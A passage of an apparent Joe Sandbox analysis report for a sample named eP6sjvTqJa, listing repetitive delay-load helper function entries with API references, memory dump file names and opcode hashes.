                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 5665e3f8398d303a7daa6ac5dbefe04c5ddf1e723a766fdeb354a1bc570e7bd0
                                                                                                                    • Instruction ID: 700788ec0125a0b78992b2e183a7cee5d198e9fbeb7ef92e34b4e57ab49c0368
                                                                                                                    • Opcode Fuzzy Hash: 5665e3f8398d303a7daa6ac5dbefe04c5ddf1e723a766fdeb354a1bc570e7bd0
                                                                                                                    • Instruction Fuzzy Hash: FFB012C22680807D3504D1491D46E7B0ACCC0C2F20330C0FEF425C2091FC80CC010431
                                                                                                                    Function 00B9E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 026cdd7b7e79a3e6cfd96a4ac3fa93941f9e073cdd76dcde86cd867d97ff2c7b
                                                                                                                    • Instruction ID: 9081614e32a09ba80bd66d8dd10d4a3dd5bdc4801fc6c1da8e31eae3bfd66702
                                                                                                                    • Opcode Fuzzy Hash: 026cdd7b7e79a3e6cfd96a4ac3fa93941f9e073cdd76dcde86cd867d97ff2c7b
                                                                                                                    • Instruction Fuzzy Hash: D0B012C22680407D3504D1651C5AE7B06CCC0C2F1033080FEF471C1492BC80CE040431
                                                                                                                    Function 00B9E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: c0e4bdac161eba8e5c1e61c6d704edf3344f98a5684a228bff987d2d00ce7d0c
                                                                                                                    • Instruction ID: a92f3b87ad9c77cb1c7c309e3c3ca1c57a6aa7eb9449c3a8f01df8d9e838ef50
                                                                                                                    • Opcode Fuzzy Hash: c0e4bdac161eba8e5c1e61c6d704edf3344f98a5684a228bff987d2d00ce7d0c
                                                                                                                    • Instruction Fuzzy Hash: F0B012C22681407D3604E1495C47E7B06CCC0C2F1033083FEF425C2091FC80CC440431
                                                                                                                    Function 00B9E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a64de4ab091dd57812260dbff0c1cf6f567459e6578942dad05576fb968d6587
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: a64de4ab091dd57812260dbff0c1cf6f567459e6578942dad05576fb968d6587
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 0ba9850c3fffa020372a701ca6a194e129b43824b74d4a45006292197b6d7a09
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 0ba9850c3fffa020372a701ca6a194e129b43824b74d4a45006292197b6d7a09
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 4efd54497283eefb25244bc883b666df2d1127d24948d0787b8e7d2c882b46a3
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 4efd54497283eefb25244bc883b666df2d1127d24948d0787b8e7d2c882b46a3
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ad52a5d45c1f593b160c033488c019f11a9c7087d79f633a1461f3a4fd839278
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: ad52a5d45c1f593b160c033488c019f11a9c7087d79f633a1461f3a4fd839278
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 3f3b0f500c9160b97b1033c091ab8223a6dd74e9c51977be63639d6526876904
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 3f3b0f500c9160b97b1033c091ab8223a6dd74e9c51977be63639d6526876904
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d861aa1298c6919f8ee9e2dbc809beda64e58f2bccdd6b44719e793ff2627aec
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: d861aa1298c6919f8ee9e2dbc809beda64e58f2bccdd6b44719e793ff2627aec
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ec095bf5a1965f9595b1cad6e801003cce7b632a059acc638451bf668fad396f
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: ec095bf5a1965f9595b1cad6e801003cce7b632a059acc638451bf668fad396f
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 62996e78b5b38163e81e99407c747d0cd28f2e3a9ae825a81e4e02848b58290b
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 62996e78b5b38163e81e99407c747d0cd28f2e3a9ae825a81e4e02848b58290b
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 68388b550fd036fd397170a3e0b6e43b11b8097f8173473f76a5a50002df7c9f
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 68388b550fd036fd397170a3e0b6e43b11b8097f8173473f76a5a50002df7c9f
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d0cb53f076c2ff8374ea3c6b3c182c8042101f6265fdfb2e8f755137a68ff669
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: d0cb53f076c2ff8374ea3c6b3c182c8042101f6265fdfb2e8f755137a68ff669
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    Function 00B9E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
